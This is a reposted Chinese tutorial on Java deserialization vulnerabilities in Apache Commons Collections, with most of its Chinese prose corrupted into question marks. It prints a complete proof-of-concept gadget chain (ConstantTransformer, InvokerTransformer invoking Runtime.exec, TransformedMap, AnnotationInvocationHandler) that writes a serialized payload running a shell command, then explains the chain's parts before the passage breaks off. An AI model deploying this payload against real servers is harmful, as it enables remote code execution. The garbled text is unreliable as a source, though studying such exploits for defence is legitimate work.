Java?????л???????

?????51CTO ???????[ 2016/9/21 10:14:25 ] ????????Java ??????????? ???

????Java?????л????????????????2??????????а?????????jenkins??weblogic??jboss????????????ù???????????Java?????л??????????????????Java?????л???Poc????????????
????Java?????л???????
????· Java???л??????????????????????????????楨???????????У?Java?е?ObjectOutputStream???writeObject()??????????????л???
????· Java?????л????????????????????????ObjectInputStream???readObject()????????????л???
????????????Java?????л?????????????з????л?????????????????л?????????????????????????????????
????Java?????л?Poc???
public class test {
public static void main(String[] args) throws Exception {
String[] execArgs = new String[] { "sh"?? "-c"?? "whoami > /tmp/fuck" };
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class)??
new InvokerTransformer(
"getMethod"??
new Class[] {String.class?? Class[].class }??
new Object[] {"getRuntime"?? new Class[0] }
)??
new InvokerTransformer(
"invoke"??
new Class[] {Object.class??
Object[].class }?? new Object[] {null?? null }
)??
new InvokerTransformer(
"exec"??
new Class[] {String[].class }??
new Object[] { execArgs }
)
};
Transformer transformedChain = new ChainedTransformer(transformers);
Map<String?? String> BeforeTransformerMap = new HashMap<String?? String>();
BeforeTransformerMap.put("hello"?? "manning");
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap?? null?? transformedChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? AfterTransformerMap);
File f = new File("temp.bin");
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
}
}
???????????????????poc?????????Java?е??Щ???
??????Apache commons????????к??jar??(jar??????????python???)??????jar?????溬?е????????????????

????????Java?????л??????????org.apache.commons.collections????????檔org.apache.commons.collections???????????????????????Java??collection??????????Щ????????collection??????????????????????Java?е?collection??????????????collection??????????collection??????????collection?set??list??queue???????????????collection??set??list??queue?????collection?????????????????????????????巽???????set??list??queue???
??????org.apache.commons.collections???????????????Transformer????????????????
????Defines a functor interface implemented by classes that transform one object into another.
?????????????Transformer????????????????????????????????????????????Transformer???????????????

????????????Java?????л??????poc???е???

????· ConstantTransformer
????Transformer implementation that returns the same constant each time. (?????????????????????????)
????· InvokerTransformer
????Transformer implementation that creates a new object instance by reflection. (??????????????????)
????· ChainedTransformer
????Transformer implementation that chains the specified transformers together. (???Щtransformer????????????????????????????????????????????????transformer???????)
?????????????????????????????poc???poc???棬????????????????1??????
????· execArgs
????????е?????????
????· transformers
???????transformer?????????????????(????transformer????)?????????
????· transformedChain
????ChainedTransformer?????????transformers???飬???????transformers??????????????????
????· BeforeTransformerMap
????Map?????????????Map??Map???????????????????????????python??dict?????
????· AfterTransformerMap